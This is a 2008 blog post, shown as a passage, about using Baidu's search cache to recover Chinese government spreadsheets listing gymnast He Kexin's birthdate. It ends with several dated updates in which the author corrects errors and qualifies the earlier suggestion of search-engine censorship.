What if we don't give up easy though?

What about Baidu? Baidu is a Chinese language search engine with its own cache and search index. It's different than google. So what if we run the same search on Baidu? Here's the Baidu results, as of today, for the same search string: (site:cn 何可欣 filetype:xls 1994). For those who don't speak Search Engine, that's all Excel spreadsheets in China that contain He Kexin's name and the string 1994. So, here's Baidu:

Interesting. Baidu lists TWO spreadsheets at sport.gov.cn with Kexin's name. Not surprisingly, the new one discovered by Baidu has been been deleted as well:

But what about the Baidu cache? If you click on the "HTML" link next to these XLS documents on Baidu (do it yourself!) you can access a cached copy of the document. This means that it was fully available... until recently. So, does Baidu's copies of these documents have anything to say about Ms. Kexin?

In the Baidu cache, which apparently has not been hit with the scrub brush (yet), two spreadsheets published by the Chinese government on sport.gov.cn both list He Kexin's birthday as 01-01-1994, making her 14 years old. For as long as these links work, you can access the documents directly, either using the directions and screenshots above, or these links: cache1 cache2

Conclusions

How official are these documents? Pretty dang official - they were issued by the General Administration of Sport of China.

Much of the coverage regarding Kexin's age has only mentioned "allegations" of fraud, and the IOC has ignored the matter completely. I believe that these primary documents, issued by the Chinese state, directly available from China by clicking on the links above rise to a level of evidence higher than "allegation". The following points bear mentioning:

Google's cached copy of the spreadsheet does not contain Kexin's age record, and Baidu's does. This does not necessarily imply that Google allowed its data to be rewritten by Chinese censors, but the possibility does present itself.
From the minute I pressed the publish button on this blog, the clock is ticking until Kexin's true age is wiped out of the Baidu cache forever. It is up to you, the folks reading this blog, to take your own screenshots and notarize them by publishing them. If you put a link in the comments section, I'll post it.

In closing, I'd like to point out that this is not an anti-China post; far from it. While I may disagree with the effort the Chinese government is making to conceal this young woman's age, I have the utmost respect for the Chinese people, and I believe that united they will be able to make state sponsored censorship a thing of the past.

Digg This

Update 8/27/2008

It seems that most of the traffic to this blog is still coming here, to the original post. I'd like to point out for the record, this is the first blog post I've ever written in my life. I did my best. That said, there's now a lot more to the story. Please visit http://strydehax.blogspot.com.

One side bar to this post that keeps getting picked up is my statement that censors could have had access to the search engine results. It remains true that this is possible, or at least I cannot disprove it. However, it is very important to note that documents disappearing from web servers is very different from results leaving a search engine. Results "time out" and naturally remove themselves from search engines all the time; this is a natural artifact of how the technology works. Hence I cannot in any way state that there is evidence that information is being intentionally removed from search engines. When I was writing this, it seemed like everything I clicked on had already been deleted; in retrospect, it's important to differentiate between missing documents on web servers (which is highly suspicious) and missing search engine results, which can simply be an artifact of the search engine catching up. I hope this clarifies things.

Update 8/22/2008

Referred to this story directly? Please see the rest of my blog, as I attempt to follow up in real time: strydehax.blogspot.com

Many readers have pointed out mistakes in this posting, including my use of the phrase "Ms. Kexin", which is incorrect (the correct name order dictates the phrase "Ms. He". I have decided not to modify my original posting. If I go back and change my mistakes, how can I comment honestly on the topic of online redaction?

I've recently been alerted to this excellent Huffington Post article which uses screenshots of primary sources regarding He Kexin. This is the type of reporting I was originally looking for! One guy can't read everything. Tip o' the hat.

Update 8/20/2008

New to the story? Check out Part II

Well, this has hit Slashdot and appears to have legs. I am approving comments as fast as I can; bear with me

Readers in the comment section have noted that I misspelled Ms. Kexin's name as Hexin; corrected

I have received several comments to the effect of "Who cares how old she is?". In response: certainly not me. This blog is about government censorship and state sponsored fraud. I am attempting to demonstrate the power of free citizens to subvert government censorship. The finer points of gymnastics competitions are outside the scope of this post.

An alert reader has alerted me that perhaps the New York Times was the first to run across these documents, in their story here. In fact, it may have been visits by the NY Times reporter to the official web site that originally caused the Excel spreadsheets to be deleted. I find it unfortunate that at the time the NYTimes did not 'notarize' and redistribute the primary documents when they were found, if this is the case. Either way, it appears readers of this blog have taken up the torch. The truth isn't going to be stamped out.

I am amazed at the outpouring of technical support and mirrors contributed by readers in order to preserve these records. I will continue to post every one I receive; thank you.

I can be reached privately via stryde dot blog at gmail dot com